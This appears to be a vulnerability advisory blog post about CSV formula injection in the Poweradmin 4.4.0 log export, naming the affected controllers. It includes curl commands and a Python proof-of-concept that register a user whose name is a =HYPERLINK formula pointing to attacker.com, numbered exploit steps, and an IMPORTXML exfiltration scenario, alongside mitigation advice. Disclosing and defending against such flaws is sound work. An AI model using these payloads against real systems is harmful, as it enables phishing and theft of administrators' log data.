Listen to this Post
Intro
The vulnerability arises from the unsafe handling of user‑controlled data, specifically the `username` field, during CSV export operations. Poweradmin v4.4.0 writes log entries to CSV files using `fputcsv()` without any sanitisation of characters that spreadsheet applications interpret as formula triggers (=, +, -, @). When an administrator exports activity logs and opens the resulting CSV in Microsoft Excel, LibreOffice Calc, or Google Sheets, any formula stored in a username is executed by the spreadsheet engine.
The issue exists in four log export controllers: `ListLogUsersController.php` (lines 188, 194), ListLogZonesController.php, ListLogGroupsController.php, and ListLogApiController.php. In each, the `user` column (actor) and the `username` column (affected account) are written verbatim.
– A username such as `=1+1` is written without CSV enclosure quotes (because it contains no commas or quotes), so spreadsheet applications treat it directly as a formula.
– A username containing commas or quotes (e.g. =HYPERLINK("http://attacker.com","Click here")) is enclosed in CSV quotes with internal quotes doubled, but spreadsheet applications still evaluate the cell value as a formula since it begins with =.
Additionally, PHP deprecation warnings are emitted directly into the HTTP response body before CSV headers, exposing internal file paths (e.g. /app/lib/Application/Controller/ListLogUsersController.php) – a secondary information disclosure issue (CWE‑209). This also corrupts the CSV file when PHP error reporting is enabled.
An attacker with the ability to create user accounts (i.e. an account with `user_add_new` permission) can inject a malicious formula as a username. When the administrator later exports the log and opens the CSV, the formula executes. Attack scenarios include phishing (rendering a convincing hyperlink) and data exfiltration (using `=IMPORTXML()` or similar to send adjacent cell data to an attacker‑controlled server).
The vulnerability is confirmed on Poweradmin v4.4.0, including the Docker image poweradmin/poweradmin:latest. No CVE has been assigned to this specific issue at the time of writing.
DailyCVE Form
Platform: Poweradmin
Version: 4.4.0
Vulnerability: CSV Formula Injection
Severity: Medium
date: Unknown
Prediction: Unknown
What Undercode Say
Create a malicious user with formula payload curl -X POST -d "username==HYPERLINK(\"http://attacker.com\",\"Confirm Identity\")&[email protected]&password=EvilPass123&role=user" \ -b "admin_session_cookie" \ http://target.poweradmin/admin/users/add Export the CSV that will execute the formula curl -b "admin_session_cookie" \ http://target.poweradmin/admin/logs/export > malicious.csv Python script to automate the attack import requests session = requests.Session() session.post('http://target.poweradmin/login', data={'username':'admin','password':'admin123'}) payload = '=HYPERLINK("http://attacker.com","Click here")' session.post('http://target.poweradmin/admin/users/add', data={'username':payload,'email':'[email protected]','password':'EvilPass123'}) response = session.get('http://target.poweradmin/admin/logs/export') with open('poc.csv', 'wb') as f: f.write(response.content) print("CSV file 'poc.csv' saved. Open it in Excel/LibreOffice to trigger payload.")
Exploit
- Log in as an administrator (or any account with `user_add_new` permission).
2. Create a new user with the username:
`=HYPERLINK(“http://attacker.com”,”Confirm Identity”)`
3. Log out and log in as that user to generate a log entry.
4. Log back in as administrator and navigate to `Users` → Logs.
5. Click Export CSV.
- Open the downloaded CSV file in Microsoft Excel or LibreOffice Calc.
Result: The cell containing the username becomes a clickable hyperlink labelled “Confirm Identity”. Using a simpler payload like `=1+1` makes the cell display2, confirming formula execution.
Protection
- Input sanitisation: Reject or escape any username that begins with
=,+,-, or@. - CSV quoting: Always wrap exported fields in double quotes, regardless of content.
- Spread‑application hardening: Disable automatic formula evaluation or enable “Protected View” for files from untrusted sources.
- Upgrade Poweradmin: Apply any future patch that addresses CSV injection in the log export controllers.
- Least privilege: Restrict the `user_add_new` permission to only those administrators who absolutely need it.
Impact
- Phishing: A malicious actor can craft a formula that renders as a convincing link in the exported report, tricking a higher‑privileged administrator into clicking it.
- Data exfiltration: Using `=IMPORTXML()` (Google Sheets) or similar functions, adjacent log data can be silently sent to an attacker‑controlled server when the sheet is opened.
- Reputation damage: If exploited successfully, the organisation’s internal logs may be compromised, leading to loss of trust.
- Compliance breach: Unauthorised data extraction may violate GDPR, HIPAA, or other regulatory frameworks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
